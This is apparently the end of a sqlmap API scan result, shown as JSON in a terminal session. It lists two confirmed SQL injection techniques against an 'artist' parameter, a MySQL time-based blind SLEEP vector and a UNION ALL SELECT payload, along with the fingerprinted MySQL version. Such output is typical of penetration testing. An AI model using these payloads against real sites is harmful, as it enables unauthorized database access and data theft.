                            "comment": "",
                            "matchRatio": 0.85,
                            "trueCode": 200,
                            "title": "MySQL >= 5.0.12 AND time-based blind",
                            "templatePayload": null,
                            "vector": "AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLE
EPTIME]),[RANDNUM])",
                            "falseCode": null,
                            "where": 1,
                            "payload": "artist=1 AND SLEEP([SLEEPTIME])"
                        },
                        "6": {
                            "comment": "[GENERIC_SQL_COMMENT]",
                            "matchRatio": 0.85,
                            "trueCode": null,
                            "title": "Generic UNION query (NULL) - 1 to 20 colum
ns",
                            "templatePayload": null,
                            "vector": [
                                2,
                                3,
                                "[GENERIC_SQL_COMMENT]",
                                "",
                                "",
                                "NULL",
                                2,
                                false,
                                false
                            ],
                            "falseCode": null,
                            "where": 2,
                            "payload": "artist=-5376 UNION ALL SELECT NULL,NULL,
CONCAT(0x716b706a71,0x4a754d495377744d4273616c436b4b6a504164666a5572477241596649
704c68614672644a477474,0x7162717171)-- aAjy"
                        }
                    }
                }
            ]
        },
        {
            "status": 1,
            "type": 2,
            "value": "5.1.73-0ubuntu0.10.04.1"
        }
    ],
    "success": true,
    "error": []
}
api (a42ddaef02e976f0)> exit
$